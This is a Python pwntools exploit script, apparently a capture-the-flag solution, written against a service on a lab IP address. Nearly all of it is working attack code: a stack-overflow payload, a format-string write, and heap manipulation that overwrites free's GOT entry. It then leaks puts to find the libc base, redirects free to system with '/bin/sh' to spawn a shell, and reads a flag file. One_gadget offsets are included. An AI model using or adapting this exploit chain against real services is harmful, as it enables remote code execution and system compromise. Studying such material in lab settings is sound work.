from
pwn
import
*
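# Thin wrappers around the pwntools tube `p` (assigned later in this file).
# Written as plain `def`s instead of assigned lambdas (PEP 8 E731) so that
# tracebacks and debug logs show a real function name.  Call signatures are
# unchanged from the original lambdas.
def sd(x):
    """Send *x* to the tube `p` as-is (no newline appended)."""
    return p.send(x)


def sl(x):
    """Send *x* to the tube `p` followed by a newline."""
    return p.sendline(x)


def sda(x, y):
    """Wait until *x* has been received from `p`, then send *y*."""
    return p.sendafter(x, y)


def sla(x, y):
    """Wait until *x* has been received from `p`, then send *y* plus a newline."""
    return p.sendlineafter(x, y)


def ru(x):
    """Read from `p` up to *x* and return what was read."""
    return p.recvuntil(x)


def rv(x):
    """Read up to *x* bytes from `p`."""
    return p.recv(x)


def io():
    """Hand the tube `p` over to interactive use."""
    return p.interactive()


def ps():
    """Pause the script (pwntools `pause`)."""
    return pause()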
# pwntools debug logging: tube traffic is logged to the console.
context.log_level = 'debug'

# All 64 bits set.  Despite the name this is the *unsigned* 64-bit maximum
# (0xffffffffffffffff), not INT64_MAX; the name is kept because later parts
# of the script read it.
i64_max = 0xFFFFFFFFFFFFFFFF

# Tube to the lab host named in the original script, and the libc build the
# script assumes the remote service is running (used later for symbol lookups).
p = remote('192.168.99.133', '10006')
libc = ELF('./libc-2.23.so')
# First stage of the dialogue with the service.  Prompt strings and payloads
# are reproduced byte-for-byte from the original script.
sla('(y/n)', 'y')
sl('./next')

# 0x38 filler bytes followed by an 8-byte value taken verbatim from the
# original script (presumably an address inside the target binary; not
# verifiable from this file).
hotel_backdoor = 0x4006B6
first_payload = b'a' * 0x38 + p64(hotel_backdoor)
sla('you?\n', first_payload)
sla('you!', './next')

# A printf-style format string ('%c' padding, then '%43$n'), sent verbatim.
format_payload = b'%1515c%43$naaaa'
sla('you?\n', format_payload)
sla('you!', './next')

sla('go?\n', 'bedroom')
sla('go?\n', 'bedroom')

# Eight copies of 'a\x00' followed by another 8-byte constant from the script.
name_payload = b'a\x00' * 8 + p64(0x400896)
sda('name: ', name_payload)
sla('go?\n', 'a')
sl('./next')
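def add(size, name, ac=True):
    """Send a ``create <size> <name>`` command to the target.

    Args:
        size: value placed after ``create``; anything accepted by ``str()``
            (the script passes both ints and pre-formatted strings).
        name: str or bytes appended after the size; str is UTF-8 encoded.
        ac: when True, wait for the 'accept' prompt before sending;
            otherwise send the line immediately.
    """
    # isinstance rather than `type(name) == str`: str subclasses are
    # encoded too instead of failing on the bytes + str concatenation below.
    if isinstance(name, str):
        name = name.encode()
    payload = f'create {size} '.encode() + name
    if ac:
        sla('accept', payload)
    else:
        sl(payload)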
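def free(name, ac=True):
    """Send a ``destory <name>`` command to the target.

    The command keyword keeps the original script's spelling, which
    presumably mirrors what the target program parses; it is a protocol
    string and must not be "corrected".

    Args:
        name: str or bytes appended after the keyword; str is UTF-8 encoded.
        ac: when True, wait for the 'accept' prompt before sending;
            otherwise send the line immediately.
    """
    # isinstance rather than `type(name) == str` so str subclasses are
    # encoded as well.
    if isinstance(name, str):
        name = name.encode()
    payload = b'destory ' + name
    if ac:
        sla('accept', payload)
    else:
        sl(payload)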
# Request a 'create' and parse the heap pointer the program echoes after
# 'address is: ' (hexadecimal text terminated by a newline).
sla('?\n', 'create')
ru('address is: ')
heap_address = int(ru('\n'), 16)
print('heap_address: ', hex(heap_address))

# Name field: 0xf8 filler bytes followed by the all-ones qword.
sda('name: ', b'a' * 0xf8 + p64(i64_max))

# Five 0x18-byte allocations; only the first is sent without waiting for
# the 'accept' prompt.
add(0x18, 'aaa', False)
for label in ('bbb', 'ccc', 'ddd', 'eee'):
    add(0x18, label)

# Release two of them and re-create the first; the order is kept exactly
# as in the original script.
free('ccc')
free('aaa')
add(0x18, 'aaa')
# Address constant recorded by the original script (named after the GOT
# slot of free in the target binary).
free_got = 0x602018

# Size argument passed as a pre-formatted string: the distance from the
# leaked heap pointer, minus a set of fixed offsets, to free_got.  The
# offsets are the script's constants; their layout meaning is not
# verifiable from this file.
size_to_got = free_got - heap_address - 0x100 - 0x80 - 0x18 - 0xc0
add(str(size_to_got), 'bbbb')

free('ddd')
free('aaa')

# 8 filler bytes followed by an 8-byte constant whose NUL bytes are rewritten
# as tabs and whose last byte is dropped (7 bytes sent).
magic_addr = 0x4010CF
encoded_magic = p64(magic_addr).replace(b'\x00', b'\t')[:-1]
add(0x88, b'a' * 8 + encoded_magic)
add(0x28, b'a' * 0x10)

# Bare 'create', then a 0xf8-byte name record: a zero qword, two dwords,
# two address constants, zero padding up to 0xf8, and the all-ones qword.
sl('create')
record = (
    p64(0)
    + p32(0)
    + p32(2)
    + p64(0x6020e0)
    + p64(0x602030)
    + b'\x00' * (0xf8 - 0x20)
    + p64(i64_max)
)
sla('name: ', record)
free('world', False)
# Read the 6 bytes the program prints after 'world.\n' and zero-extend them
# to an 8-byte little-endian value.
ru('world.\n')
leaked = rv(6) + b'\x00\x00'
puts_address = u64(leaked)

# Rebase the libc ELF object on the leaked puts address so that symbol
# lookups below return runtime addresses.
libc.address = puts_address - libc.sym['puts']
print('libc->', hex(libc.address))

# NOTE: `sys` very likely shadows the module name that `from pwn import *`
# re-exports; the name is kept because a later part of the script reads it.
sys = libc.sym['system']
sh = next(libc.search(b'/bin/sh'))
# Another pre-formatted size string built purely from fixed constants,
# sent without waiting for the 'accept' prompt.
add(str(free_got - 0x6021c0 - 0x20), 'cccc', False)

# Candidate offsets carried over from the original script.  `one` is bound
# here but not read anywhere in the visible part of this file.
ones = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
one = libc.address + ones[3]

# 8 filler bytes followed by the resolved libc symbol, NUL bytes rewritten
# as tabs and the last byte dropped (7 bytes sent).
encoded_sys = p64(sys).replace(b'\x00', b'\t')[:-1]
add(0x88, b'a' * 8 + encoded_sys)
add(0x18, b'/bin/sh\x00')
free('world', False)

# Final exchange, then hand the tube over to the operator.
sl('./next')
ru('world!\n')
sl('cat .../.really_flag')
io()